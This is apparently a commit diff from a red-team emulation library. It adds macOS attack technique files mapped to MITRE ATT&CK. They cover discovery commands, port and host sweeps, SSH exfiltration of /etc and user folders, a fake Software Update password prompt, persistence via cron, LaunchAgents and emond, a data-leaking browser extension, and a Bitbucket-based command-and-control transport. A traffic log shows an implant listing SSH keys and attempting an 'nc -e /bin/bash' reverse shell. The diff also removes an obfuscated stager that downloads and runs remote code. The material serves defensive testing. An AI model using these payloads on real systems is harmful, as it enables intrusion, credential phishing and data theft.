MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
### Enumerate Groups and users
Input:
groups
Input:
id
Input:
dscl . list /Groups
Input:
dscl . list /Users
Input:
dscl . list /Users | grep -v '_'
Input:
dscacheutil -q group
Input:
dscacheutil -q user
Mac/Discovery/File_and_Directory_Discovery.md
+34
View File
@@ -0,0 +1,34 @@
## File and Directory Discovery
MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
### File and Directory Discovery
Input:
ls -a > allcontents.txt
Input:
ls -la /Library/Preferences/ > detailedprefsinfo.txt
Input:
file */* *>> ../files.txt
Input:
find . -type f
Input:
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
References:
http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
Mac/Discovery/Network_Service_Scanning.md
+9
View File
@@ -0,0 +1,9 @@
## Network Service Scanning
MITRE ATT&CK Technique: [T1046](https://attack.mitre.org/wiki/Technique/T1046)
### Bash One Liner
Input:
for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; done
Mac/Discovery/Network_Share_Discovery.md
+18
View File
@@ -0,0 +1,18 @@
## Network Share Discovery
MITRE ATT&CK Technique: [T1135](https://attack.mitre.org/wiki/Technique/T1135)
### Local Mounts
Input:
df -aH
### Remote Find Mounts
smbutil view -g //<hostname>
### NFS Show mounts
showmount hostname
Mac/Discovery/Permissions_Groups_Discovery.md
+20
View File
@@ -0,0 +1,20 @@
## Permission Groups Discovery
MITRE ATT&CK Technique: [T1069](https://attack.mitre.org/wiki/Technique/T1069)
### Domain
Input:
dscacheutil -q group
### Local
Input:
dscl . -list /Groups
Input:
groups
Mac/Discovery/Process_Discovery.md
+14
View File
@@ -0,0 +1,14 @@
## Process Discovery
MITRE ATT&CK Technique: [T1057](https://attack.mitre.org/wiki/Technique/T1057)
### Process Discovery
Input:
ps >> /tmp/loot.txt
Input:
ps aux >> /tmp/loot.txt
Mac/Discovery/Remote_System_Discovery.md
+18
View File
@@ -0,0 +1,18 @@
## Remote System Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### arp
Input:
arp -a | grep -v '^?'
### Network scanning
Input:
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
Mac/Discovery/Security_Software_Discovery.md
+12
View File
@@ -0,0 +1,12 @@
# Security Software Discovery
MITRE ATT&CK Technique: [T1063](https://attack.mitre.org/wiki/Technique/T1063)
### LittleSnitch
ps -ef | grep Little\ Snitch | grep -v grep
### CarbonBlack Response
ps aux | grep CbOsxSensorService
Mac/Discovery/System_Information_Discovery.md
+18
View File
@@ -0,0 +1,18 @@
## System Information Discovery
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
### System Information
Input:
systemsetup
Input:
system_profiler
Input:
ls -al /Applications
Mac/Discovery/System_Network_Configuration_Discovery.md
+17
View File
@@ -0,0 +1,17 @@
## System Network Configuration Discovery
MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
### Network Data
Input:
arp -a
Input:
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
Input:
ifconfig
Mac/Discovery/System_Owner_User_Discovery.md
+16
View File
@@ -0,0 +1,16 @@
## System Owner/User Discovery
MITRE ATT&CK Technique: [T1033](https://attack.mitre.org/wiki/Technique/T1033)
Input:
Users
Input:
w
Input:
who
Mac/Execution/AppleScript.md
-7
View File
@@ -9,10 +9,3 @@ MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
https://github.com/EmpireProject/Empire
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
Mac/Execution/Space_After_Filename.md
+12
View File
@@ -0,0 +1,12 @@
# Space After Filename
MITRE ATT&CK Technique: [T1151](https://attack.mitre.org/wiki/Technique/T1151)
### Generate Binary
echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
### Add Space After Filename
mv execute.txt "execute.txt "
### Execute
./execute.txt\
Mac/Exfiltration/Exfiltration_Over_Alternative_Protocol.md
+14
View File
@@ -0,0 +1,14 @@
## Exfiltration Over Alternative Protocol
MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)
### SSH
Remote to Local:
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Local to Remote:
tar czpf - /Users/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /Users.tar.gz.enc'
Mac/Mac.md
-26
View File
@@ -1,26 +0,0 @@
## MITRE ATT&CK Matrix - Mac
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol |
| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding |
| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels |
| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication |
| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption |
| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy |
| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol |
| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol |
| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol |
| Trap | | Masquerading | | | | | | | Uncommonly Used Port |
| Valid Accounts | | Plist Modification | | | | | | | Web Service |
| Web Shell | | Redundant Access | | | | | | | |
| | | Scripting | | | | | | | |
| | | Space after Filename | | | | | | | |
| | | Valid Accounts | | | | | | | |
Mac/Payloads/Browser_Extension/inline.js
+37
View File
@@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);
Mac/Payloads/Browser_Extension/manifest.json
+16
View File
@@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}
Mac/Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets/auth.json.template
+5
View File
@@ -0,0 +1,5 @@
{
"username": "",
"email": "",
"password": ""
}
Mac/Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets/bitbucket_transport.py
+191
View File
@@ -0,0 +1,191 @@
import datetime
import requests
import json
import functools
class BitbucketTransport():
"""Send and recieve arbitrary data to a queue implemented in Bitbucket Snippets.
https://confluence.atlassian.com/bitbucket/snippets-719095082.html
"""
TITLE_TEMPLATE = "stacktrace|{time}"
SNIPPET_FILE_NAME = "debug.log"
def __init__(self):
with open("auth.json") as f:
auth = json.load(f)
self.email = auth["email"]
self.password = auth["password"]
self.username = auth["username"]
self.BASE_URL = "https://api.bitbucket.org/"
self.auth = (self.email, self.password)
self.history = []
def push(self, data):
"""Add something to the end of the queue
Snippets looks like this:
push() -> [4, 3, 2, 1, 0 ...] -> pop()
The numbers indicate in which order items were added to the queue.
0 was added first, 4 last.
"""
self.history.append({
"history_type": "push",
"data": data
})
# Imitate a stack trace to avoid rasing suspicion.
metadata = {
"title": self.TITLE_TEMPLATE.format(
time=datetime.datetime.utcnow().strftime('%b-%d-%I%M%p-%G')),
"is_private": True,
}
# Send the file as a POST request of raw text, not an actual HTTP multipart file.
files = {
"file": (self.SNIPPET_FILE_NAME, data)
}
res = self._api_post(data=metadata, files=files)
return res
def pop(self):
"""Remove and return the oldest item in the queue.
Snippets looks like this:
push() -> [4, 3, 2, 1, 0 ...] -> pop()
The numbers indicate in which order items were added to the queue.
0 was added first, 4 last.
"""
snips = self.get_all_snippets()
if not snips:
return None
# Get the oldest snippet
snip = snips[0]
# Delete it
snip_content = self.get_content(snip)
self.delete_snip(snip["id"])
self.history.append({
"history_type": "pop",
"data": snip_content
})
return snip_content
def peek(self):
"""Return the oldest item in the queue.
Snippets looks like this:
push() -> [4, 3, 2, 1, 0 ...] -> pop()
The numbers indicate in which order items were added to the queue.
0 was added first, 4 last.
"""
snips = self.get_all_snippets()
if not snips:
return None
# Get the oldest snippet
snip = snips[0]
snip_content = self.get_content(snip)
self.history.append({
"history_type": "peek",
"data": snip_content
})
return snip_content
def search_filter(self, filter_, pop=False):
"""Find the first snippet that matches the provided filter.
Args:
filter_: Function that returns True for the snippets we want to match.
Returns:
The first matching snippet (as a string).
"""
snips = self.get_all_snippets()
if not snips:
return None
# Walk the front of the queue until we find the oldest item meant for us.
for snip in snips:
snip_content = self.get_content(snip)
if filter_(snip_content):
# We can only pop if we found something.
if pop:
self.delete_snip(snip["id"])
return snip_content
return None
def pop_filter(self, filter_):
return self.search_filter(filter_=filter_, pop=True)
def peek_filter(self, filter_):
return self.search_filter(filter_=filter_, pop=False)
def delete_snip(self, snip_id):
delete_url = "https://bitbucket.org/api/2.0/snippets/" + \
self.username + "/" + snip_id
requests.delete(delete_url, auth=self.auth)
def get_content(self, snip):
"""Returns the raw text in a snippet object.
Args:
snip: Dict of snippet metadata from the Bitbucket snippets API
Returns:
str: The raw snippet text.
"""
url = "/".join(snip["links"]["diff"]["href"].split("/")[:-1])
res = self._get_snip_content(url)
if res.status_code == 404:
# The snippet might have been deleted since we got its id, so we can ignore this.
return res.text
res.raise_for_status()
return res.text
@functools.lru_cache(maxsize=5)
def _get_snip_content(self, url):
"""Split out the network request part so we can cache it."""
res = requests.get(url + "/files/{filename}".format(filename=self.SNIPPET_FILE_NAME),
auth=self.auth)
return res
def _api_get(self, *args, **kwargs):
return requests.get(self.BASE_URL + "/2.0/snippets?role=owner",
auth=(self.email, self.password),
*args, **kwargs)
def _api_post(self, *args, **kwargs):
return requests.post(self.BASE_URL + "/2.0/snippets",
auth=(self.email, self.password),
*args, **kwargs)
def get_all_snippets(self):
"""Return all snippets in this Bitbucket account."""
res = self._api_get()
res.raise_for_status()
res = res.json()
# No pagination
if "next" not in res:
return res["values"]
snippets = []
while True:
# Extract the current list of snippets
for snip in res["values"]:
snippets.append(snip)
if "next" in res:
# Get the next page
res = requests.get(res["next"], auth=self.auth)
res.raise_for_status()
res = res.json()
else:
return snippets
Mac/Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets/replay.py
+18
View File
@@ -0,0 +1,18 @@
"""Replay captured traffic from malware using Bitbucket snippets as a C2."""
import json
import bitbucket_transport
transport = bitbucket_transport.BitbucketTransport()
with open("traffic_history.json") as f:
history = json.load(f)
for event in history:
print(event)
if event.get("history_type") == "push":
data = event["data"]
transport.push(data)
elif event.get("history_type") == "pop":
result = transport.pop()
if event.get("history_type") == "peek":
result = transport.peek()
Mac/Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets/requirements.txt
+1
View File
@@ -0,0 +1 @@
requests
Mac/Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets/traffic_history.json
+73
View File
@@ -0,0 +1,73 @@
[
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"pwd\", \"result\": \"/home/username/.config/t/\\n\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"whoami\", \"result\": \"username\\n\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"ls .ssh\", \"result\": \"Command 'ls .ssh' returned non-zero exit status 2.\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"ls ~/.ssh\", \"result\": \"username-test.pem\\nconfig\\nconfig~\\nid_rsa\\nid_rsa.pub\\nknown_hosts\\nprivate_key.key\\nvagrant\\n\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"nc 192.168.100.113 -e /bin/bash\", \"result\": \"Command 'nc 192.168.100.113 -e /bin/bash' returned non-zero exit status 1.\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
}
]
Mac/Payloads/hello.c
+9
View File
@@ -0,0 +1,9 @@
#import <stdio.h>
#import <unistd.h>
int main()
{
printf("Hello\n");
sleep(60);
printf("Don't run random binaries!\n");
return 0;
}
Mac/Persistence/Browser_Extensions.md
+24
View File
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
Mac/Persistence/Create_Account.md
+15
View File
@@ -0,0 +1,15 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
### dscl - add user
Input:
dscl . -create /User/AtomicRedTeam
###
Input:
/usr/sbin/sysadminctl -addUser AtomicRedTeam
Mac/Persistence/Cron_Job.md
-6
View File
@@ -1,6 +0,0 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
Mac/Persistence/Hidden_Files_and_Directories.md
+34
View File
@@ -0,0 +1,34 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
### Hide files
Input:
mv filename .filename
Input:
(Requires Apple Dev Tools)
setfile -a V filename
### Hide Directories
Input:
chflags hidden /secret/dir
Unhide:
chflags nohidden
### Show all Hidden
Execute within terminal:
defaults write com.apple.finder AppleShowAllFiles YES
Mac/Persistence/Launch_Agent.md
+38
View File
@@ -0,0 +1,38 @@
# Launch Agent
MITRE ATT&CK Technique: [T1159](https://attack.mitre.org/wiki/Technique/T1159)
Input:
Filename: .client
(Place within any directory, it will need to be referenced in the plist)
osascript -e 'tell app "Finder" to display dialog "Hello World"'
Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>com.client.client</string>
<key>ProgramArguments</key>
<array>
<string>/Users/<update path to .clent file>/.client</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>NSUIElement</key>
<string>1</string>
</dict>
</plist>
Launch:
launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
Mac/Persistence/Launch_Daemon.md
+23
View File
@@ -0,0 +1,23 @@
# Launch Daemon
MITRE ATT&CK Technique: [T1160](https://attack.mitre.org/wiki/Technique/T1160)
Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.hello</string>
<key>ProgramArguments</key>
<array>
<string>hello</string>
<string>world</string>
</array>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
Mac/Persistence/Local_Job_Scheduling.md
+49
View File
@@ -0,0 +1,49 @@
# Local Job Scheduling
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
### Cron Job
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
### Emond
Place this file in /etc/emond.d/rules/atomicredteam.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>atomicredteam</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v Tessa</string>
<string>I am a persistent startup item.</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
Place an empty file in /private/var/db/emondClients/
sudo touch /private/var/db/emondClients/randomflag

Some files were not shown because too many files have changed in this diff Show More